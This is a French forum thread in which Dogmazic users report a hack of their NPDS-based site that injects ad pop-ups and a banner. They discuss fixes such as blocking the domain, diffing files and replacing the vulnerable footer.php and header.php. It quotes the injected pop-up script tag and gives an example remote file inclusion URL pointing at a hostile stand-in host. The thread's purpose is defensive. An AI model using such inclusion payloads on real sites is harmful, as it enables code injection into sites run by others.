Pour nous contacter : soyez au rendez-vous sur IRC ! ⋅ Parcourir l'archive musicale Dogmazic ⋅ Notre Blog
Notre Documentation

Alerte au hack

Vite fait,

Je vais voir un fil que je suis. Je clique sur le logo DZ pour revenir à l'index.

Pop up de pub.

Pour reproduire, j'ai effacé mes cookies récents et refait la manip. À nouveau, pop-up de pub.
«1

Réponses

  • Dans le code de la page, vers la fin :

    [code:1]?>
    <script src="http://www.pubdirecte.com/script/pop.php?id=40006&ref=16979"></script>[/code:1]
  • Salut shangril, je confirme divers problèmes du style !

    Hier soir, pendant 10 minutes environ (mais je ne saurais plus dire vers quelle heure exactement), à chaque tentative d'accès à Dogmazic (page d'accueil ou lien direct vers une page spécifique), j'étais redirigé vers l'un ou l'autre site de publicité au bout de moins de 3 secondes !!!!!!

    Aujourd'hui, après environ 1 heure passée sur le site, j'ai eu un popup de publicité!

    Cette fois-ci, ils y ont été plus fort. Le hack semble également perturber la mise en page (volet de gauche répété 2 fois + bout de fin balise mal formée en bas de page).

    Par contre, je ne vois plus les liens publicitaires (de couleur noire) qui traînaient toujours en bas de chaque page depuis plusieurs mois.

    Il faut vraiment faire quelque chose ! Passer à la nouvelle version de NPDS impliquerait beaucoup de travail pour implémentation du spécifique Dogmazic ? Sinon, il faudrait essayer de corriger toutes les failles NPDS connues de la version actuelle et si ça ne suffit pas, essayer de localiser la ou les pages que les hackers utilisent pour effectuer leurs injections de code nuisible.

    Pourquoi faut-il toujours que certains viennent s'amuser à saboter l'excellent travail des autres, juste pour le plaisir ? :evil:
  • Ah ! J'oubliais !

    Je confirme également la disparition de la colonne de droite !

    A mon avis, l'attaque XSS n'était pas tout à fait au point cette fois... Maudits hackers !

    Le site de développement semble intact...
  • J'ai fait un whois sur Pubdirecte.com ; il n'y a pas d'enregistrement de ce nom de domaine dans Whois, théoriquement il pointe sur une adresse IP invalide (une adresse de réseau privé) ; pourtant ce matin il m'a bel et bien balancé la pub. Je suis pas retourné voir pour savoir si pubdirecte.com est toujours bel et bien en ligne ; en fait j'ai édité mon fichier host pour faire pointer ce domaine sur 127.0.0.1, comme ça ça le bloque.
  • (au fait, salut Dj_Quality)

    Il faut absolument éradiquer ce hack ! À cause peut-être de la balise fermante ?> qui a été ajoutée (quoique en fait je sais pas) un certain nombre de pages du sites ne montrent plus qu'une page blanche et rien d'autre dans la colonne du milieu. J'ai constaté ça sur la page de la radio et la page 'gérer vos playlists'.
  • Peut-être une piste :

    -remplacer footer.php à la racine du site par un fichier footer.php fait maison qui contiendrait en fait uniquement du code statique pour Google Analytics et piwIkTracker

    -enlever le code malicieux que j'ai mentionné précédemment du bloc principal des pages Dogmazic.

    Si j'ai bien compris, le hack consiste à passer une url forgée dans ce but à Footer.php qui permet l'inclusion de code arbitraire à la fin du bloc principal du site.

    Donc, en désactivant complètement l'actuel footer.php qui est livré avec ndps de la manière que je viens de décrire, la faille de sécurité devrait être supprimée.

    Inconvénient, il ne sera alors certainement plus possible d'éditer le footer (pied de page) via l'interface de npds, il faudra aller placer le code directement dans le footer.php fait maison.
  • Salut shangril !


    En fait, j'avais posté, il y a quelques temps, ce message sur le forum : "Piste pour la résolution du problème de bas de page...". Je sais que Sebkha-Chott s'était, à l'époque, penché sur le problème et avait résolu divers soucis !

    Sauf s'il s'agit d'une réécriture d'URL, "/themes/2004/footer.php" semble toujours exister et pourrait être une des causes de l'inclusion d'éléments indésirables dans les pages du site. Si l'utilisation du contenu de variables pouvant être fournies de l'extérieur (via GET/POST ou même un simple COOKIE) a été sécurisée (échappement, élimination des balises PHP/HTML, ...) à 100 % dans la page, c'est également en ordre.

    L'ennui, c'est qu'à partir de n'importe quelle page vulnérable du site, une attaque XSS bien menée peut permettre d'ajouter de nouvelles pages, de remplacer/inclure du code dans d'autres, éventuellement prendre le contrôle total de la base de données, ... Une bonne connaissance du fonctionnement et de la structure de NPDS peut évidemment rendre la tâche beaucoup plus facile aux hackers... Une bonne connaissance des failles de sécurité de la version utilisée peut les aider aussi...

    Tant que l'ensemble des pages vulnérables ne sera pas sécurisé/éliminé (si plus nécessaire), réparer les dégats ne servira malheureusement à rien (ou juste pour le très court terme), car dès que les hackers s'en rendront compte, ils recommenceront leur attaque !

    Pour le nettoyage du site, cela peut rester assez simple, télécharger l'ensemble des fichiers du portail (version de production) et les comparer avec l'ensemble des fichiers de la version saine (avant la dernière publication) en utilisant Meld, WinMerge ou un outil du genre. Cela permettra de voir rapidement les fichiers ajoutés/modifiés.

    Pour trouver via quelle(s) page(s), ils procèdent à leurs attaquent, il faut premièrement rechercher la liste des failles connues, propres à la version de NPDS utilisée et les corriger. Ensuite, analyser les logs d'accès sur le serveur (vers le 9 décembre au soir et/ou le 10 vers 13h00, apparemment) pour essayer d'identifier s'ils utilisent bien une des pages vulnérables connues ou s'ils s'amusent avec une autre... Ca c'est beaucoup moins facile, vu le volume de visiteurs sur Dogmazic, surtout s'ils utilisent une faille non-publiée ! Enfin, il faut corriger toutes les pages vulnérables connues/décelées et Dogmazic devrait pouvoir être immunisé contre ces attaques scandaleuses et nuisibles.

    shangril, tu as parfaitement compris la technique d'attaque XSS, mais comme expliqué plus haut, cela peut très bien ne pas être footer.php ou le footer.php d'un thème, cela peut être fait à partir de n'importe qu'elle page vulnérable !

    Bon, là, c'est très gros, mais un des pires trucs que tu puisses faire en PHP, c'est faire un include d'une page passée en paramètre GET/POST sans vérifier qu'il ne s'agit pas d'une URL externe. Exemple, tu as une jolie page index.php à laquelle tu envoies la page à inclure comme suit : index.php?page=contacts.html
    Le hacker va simplement passer : index.php?page=http://www.tutesfaitavoir.fr/hacks/nuisible.php
    Je te laisse imaginer le résultat... Tu peux te retrouver avec un tout nouveau site, un système de spam dernière génération ou autre...
  • Pfff... :( Et c'est r'parti... ("TELECHARGER TOUS SUR MEGAUPLOAD")
  • Je vois rien chez moi.
  • Je vois ça écrit en noir sur fond gris (lien cliquable) en haut de toutes les pages, comme si c'était une "rubrique" du site.
  • Ah ok merci pour la précision, j'avais juste pas assez cherché. Je le vois aussi.

    Bon à priori après deux secondes de recherche sur le net, le fichier header.php de NPDS a exactement la même faille de sécurité que le fichier footer.php. À dix contre un c'est ce qu'a utilisé le pirate pour injecter son code.

    Aussi, la méthode qu'on avait déjà employée pour sécuriser footer.php devrait aussi bien marcher pour header.php, à savoir créer un fichier header.php fait maison qui contient uniquement ce qui est vraiment nécessaire au site et rien d'autre.

    Ensuite, pour parfaire la sécurisation, renommer avec des noms abscons les différents header.php dans les différents sous répertoires de thème.
  • merci à tous pour signalement et pistes.
    équipe dev gestion du site prévenue..
  • Yo !

    J'ai envoyé les modifications réalisées par Shangril en ligne. Ca devrait éloigner le problème dans un premier temps. Pouvez-vous vérifier que ça ne pose pas de pb particulier sur les pages, svp ?

    Pour le reste, on essaie de trouver une solution pérenne à ce sac de noeuds, mais c'est loin d'être une évidence !

    A très bientôt.
  • je vois toujours le bandeau après vidage cache/cookie, gnagnagna sous firefox [9.0.1]
    je ne le vois pas sous ie [7]

    (mais pas contre je me connecte au site via un proxy car dogmazic bloqué au boulot, donc y'a peut-être un comportement particulier)
  • OK, je vais refouiller. Je ne vois pas le bandeau, alors forcément.... Bon....
  • Je confirme qu'il est toujours là (Chromium 15). Avant que l'alerte ne soit lancée je ne l'avais pas remarqué... Mais maintenant, je ne vois plus que ça et ça commence à m'agacer... :lol:
    Et en plus avec une faute d'orthographe! Faut le faire...
    (Soit: "Téléchargez tous sur Megaupload", "Téléchargez tout sur Mégaupload", "Téléchargez-les tous sur Mégaupload" ou à la rigueur: "Télécharger tout sur Mégaupload"... Mais certainement pas:"Télécharger tous sur Mégaupload"... Cons et incultes en plus!)
  • Je l'ai aussi ... (vivement la V3)
  • Et c'est même pas un site porno...
  • Je suis désolé pour des raisons de sécurité je ne peux pas donner beaucoup de détails sur la gestion de ce problème, mais je suis en liaison avec le bureau pour le résoudre.

Ajouter un commentaire